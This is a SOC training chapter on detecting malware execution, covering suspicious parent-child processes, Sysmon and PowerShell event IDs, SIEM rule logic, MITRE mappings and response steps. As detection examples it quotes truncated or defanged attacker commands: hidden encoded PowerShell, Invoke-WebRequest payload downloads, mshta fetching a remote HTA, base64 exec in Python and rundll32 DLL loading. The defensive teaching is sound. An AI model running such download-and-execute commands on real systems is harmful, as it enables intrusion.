Malware execution detection focuses on identifying when malicious code begins running on an endpoint, whether it is a binary, script, macro, DLL, or fileless technique.
In SOC operations, detecting malware execution early is critical because it prevents lateral movement, privilege escalation, and ransomware detonation.
This chapter explains malware execution in full-depth SOC style, including detection logic, behavioral patterns, log sources, EDR telemetry, SIEM rules, practical examples, and real attacker techniques.
What Malware Execution Looks Like
Malware executes through many methods:
-
Executable files (
.exe,.dll) -
Script engines (PowerShell, WMI, Bash, Python)
-
Office macros
-
Malicious installers
-
Archive extraction (ZIP, RAR, ISO)
-
LOLBins (rundll32, regsvr32, mshta, wmic)
-
In-memory execution (Cobalt Strike, Meterpreter)
-
Browser-based exploits
Malware rarely appears alone. It is part of a chain:
Initial Access → Execution → Persistence → C2 → Actions on Objectives
Detecting execution stops the kill chain early.
Key Indicators of Malware Execution
Malware execution usually shows one or more of these patterns.
Suspicious parent processes
-
WINWORD.exe→powershell.exe -
excel.exe→cmd.exe -
chrome.exe→mshta.exe -
outlook.exe→wscript.exe
These are strong signs of phishing-based execution.
Abnormal file locations
Malware rarely runs from trusted directories.
Suspicious paths:
-
%TEMP% -
%APPDATA% -
%PUBLIC% -
%PROGRAMDATA% -
/tmp/ -
/var/tmp/
Example:
C:\Users\Public\script.exe
Encoded or obfuscated command lines
Examples:
powershell.exe -nop -w hidden -enc JAB...
wscript.exe //e:vbscript
python.exe -c "exec(__import__('base64')..."
Encoding hides malicious behavior.
Unexpected network connections after execution
Examples:
-
Outbound to unknown IP/TLD
-
HTTPS connections with no SNI
-
Beaconing every X seconds
-
Traffic to dynamic DNS domains
payload.exe → 104.22.113.51:443
DLL loading & side-loading
Suspicious usage:
rundll32.exe payload.dll,Start
A common malware technique.
Script-Powered execution
Malware often uses:
-
PowerShell
-
WMI
-
JScript
-
HTA
-
Python
-
Bash
Example:
powershell.exe Invoke-WebRequest -Uri http[:]//host/payload.exe
Detection Logic by Source
Below are the exact telemetry sources used in SOC investigations.
Windows Event Logs
Event ID 4688 (Process Creation)
Shows:
-
Parent process
-
Executable name
-
Command-line
Example detection logic:
-
Parent = Word, Excel
-
Child = PowerShell, cmd, rundll32
-
Command line contains download or encoded payload
Sysmon
Event ID 1 (Process Creation)
Primary source for malware execution.
Event ID 7 (Image Loaded)
Detects malicious DLL injection.
Event ID 11 (File Created)
Shows payload drop before execution.
Event ID 13 (Registry Write)
Detects persistence creation.
PowerShell Logs
Detect encoded or obfuscated commands:
-
Event ID 4104 → script block logging
-
Event ID 400, 403 → engine start
EDR Telemetry
EDR provides:
-
Process tree
-
Suspicious threads
-
Memory injection alerts
-
Behavior-based detections
-
Network activity tied to processes
-
Reputation alerts
EDR is the strongest source for detecting malware execution.
SIEM Detection Logic for Malware Execution
Here are real detection conditions used in SOC environments.
Rule: Office spawning PowerShell
ParentImage IN (WINWORD.exe, excel.exe, outlook.exe)
AND Image = powershell.exe
Rule: Encoded PowerShell Execution
Image = powershell.exe
AND CommandLine contains "-enc"
Rule: Suspicious Executable in User Directory
Image endswith .exe
AND ImagePath contains ("AppData","Temp","Public")
Rule: HTA-Based Malware Execution
ParentImage = chrome.exe
AND Image = mshta.exe
Rule: Script Engines Downloading Payloads
CommandLine contains ("Invoke-WebRequest","curl","wget")
Behavioral Techniques (MITRE ATT&CK)
Malware execution maps to:
-
T1204 (User Execution)
-
T1059 (Command and Scripting Interpreter)
-
T1106 (Native API Execution)
-
T1218 (Signed Binary Proxy Execution)
-
T1047 (WMI Execution)
-
T1055 (Process Injection)
Mapping logs to MITRE helps classify the attack stage.
Practical Examples
Example 1 — Phishing attachment triggers malware
WINWORD.exe
↳ powershell.exe -nop -w hidden -enc JAB...
↳ payload.exe
Detection:
-
Parent-child mismatch
-
Encoded command
-
Payload execution
Example 2 — In-memory RAT execution
rundll32.exe → reflective DLL → beacon
Detection:
-
DLL loaded from user directory
-
Unbacked memory region
-
Network beaconing
Example 3 — Macro launches script engine
excel.exe → wscript.exe → downloader.js → malware.exe
Detection:
-
Wscript spawned by Excel
-
JS script creation
-
Network downloads
Example 4 — Browser exploit triggers mshta
chrome.exe → mshta.exe http[:]//malicious/hta
Detection:
-
Execution of remote script
-
Suspicious parent
-
Unwanted outbound traffic
Example 5 — Python-based malware execution
python.exe -c "exec(base64.b64decode(...))"
Detection:
-
Inline execution
-
Encoded payload
Incident Response Actions After Malware Execution
-
Isolate host
-
Kill malicious processes
-
Collect process tree and memory snapshot
-
Extract IOCs
-
Check for persistence modification
-
Block C2 indicators
-
Hunt for lateral movement
-
Perform full RCA
Intel Dump
-
Malware execution is detected by analyzing process creation, command-lines, parents, children, and network behavior.
-
Key telemetry: Sysmon, 4688 logs, PowerShell logs, EDR data, and registry activity.
-
Suspicious indicators include encoded PowerShell, LOLBins, unexpected parent processes, and execution in user directories.
-
SIEM rules detect execution based on parent-child relationships, command patterns, and download activity.
-
EDR behavior analytics catch in-memory and fileless attacks.
-
Early detection of execution prevents ransomware, C2 establishment, and lateral movement.